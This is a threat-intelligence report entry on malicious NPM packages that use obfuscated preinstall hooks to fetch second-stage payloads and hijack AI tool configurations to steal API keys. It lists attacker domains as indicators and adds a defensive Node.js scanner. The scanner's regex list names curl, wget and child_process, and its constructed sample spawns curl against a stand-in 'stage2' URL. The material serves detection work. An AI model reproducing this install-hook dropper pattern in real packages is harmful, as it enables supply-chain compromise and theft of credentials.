Hunting Malicious NPM Packages with AI
ID: e697ea08-f167-5a45-b3a3-fe71b8ee0be1
STIX ID: report--e697ea08-f167-5a45-b3a3-fe71b8ee0be1
Feed Name: On the Hunt
This report details a series of malicious NPM packages, discovered by a custom scanner, that use obfuscated JavaScript and preinstall scripts to spawn child processes and fetch second-stage payloads (e.g., from d38u852ncr1ov2.cloudfront.net), as well as packages that hijack AI tool configurations to proxy and exfiltrate API keys and conversations (e.g., via heibai.natapp1.cc). It provides decoded code snippets, attacker infrastructure and IOCs (packages, domains, a SHA-256 binary hash), notes suspected DPRK linkage for some of the activity, and highlights credential-harvesting and persistence behaviors. Together these constitute an active supply-chain and credential-exfiltration threat vector.
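The install-hook dropper pattern the summary describes (a preinstall script that runs obfuscated code, decodes a string, spawns a child process and reaches out for a second stage) can be triaged before a package is ever installed by inspecting its manifest and the files its lifecycle hooks run. The following Node.js checker is an added example, not the report's scanner or any published tool; the manifest, file contents and indicator list are constructed for illustration.

```javascript
// Added example: flag npm lifecycle hooks that show the install-time dropper
// pattern. Node.js standard library only; all sample data below is constructed.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each indicator is [label, regex]; labels are what the findings report.
const INDICATORS = [
  ['inline-node-eval', /\bnode\s+(-e|--eval)\b/],
  ['child-process', /child_process|\bspawn\s*\(|\bexec(Sync)?\s*\(/],
  ['dynamic-eval', /\beval\s*\(|new\s+Function\s*\(/],
  ['base64-decode', /Buffer\.from\s*\([^)]*['"]base64['"]\)|\batob\s*\(/],
  ['hex-escaped-string', /(\\x[0-9a-fA-F]{2}){4,}/],
  ['remote-fetch', /\b(curl|wget)\b|https?:\/\/[^\s'"]+/],
];

// Returns the labels of every indicator that matches the given text.
function scanText(text) {
  return INDICATORS.filter(([, re]) => re.test(text)).map(([label]) => label);
}

// Audits a package.json string. `files` maps a relative path to its contents;
// a file is scanned when a lifecycle hook's command references it, so the
// obfuscated helper behind "node setup.js" is covered, not just the one-liner.
function auditManifest(manifestText, files = {}) {
  const scripts = JSON.parse(manifestText).scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    let labels = scanText(cmd);
    for (const [name, body] of Object.entries(files)) {
      if (cmd.includes(name)) {
        labels = labels.concat(scanText(body).map((l) => `${name}:${l}`));
      }
    }
    if (labels.length) findings.push({ hook, command: cmd, labels: [...new Set(labels)] });
  }
  return findings;
}

// Constructed sample modelled on the summary: a preinstall hook runs a helper
// that base64-decodes a URL and spawns a child process to fetch it.
const SAMPLE_MANIFEST = JSON.stringify({
  name: 'example-helper', version: '1.0.0',
  scripts: { preinstall: 'node setup.js', test: 'jest' },
});
const SAMPLE_FILES = {
  'setup.js':
    "const u=Buffer.from('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvc3RhZ2Uy','base64').toString();\n" +
    "require('child_process').exec('curl -s '+u);",
};

console.log(JSON.stringify(auditManifest(SAMPLE_MANIFEST, SAMPLE_FILES), null, 2));
```

A hit on the preinstall hook is a reason to pull the tarball and read the referenced file, not proof of malice on its own; legitimate native-build hooks such as `node-gyp rebuild` produce no findings here.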
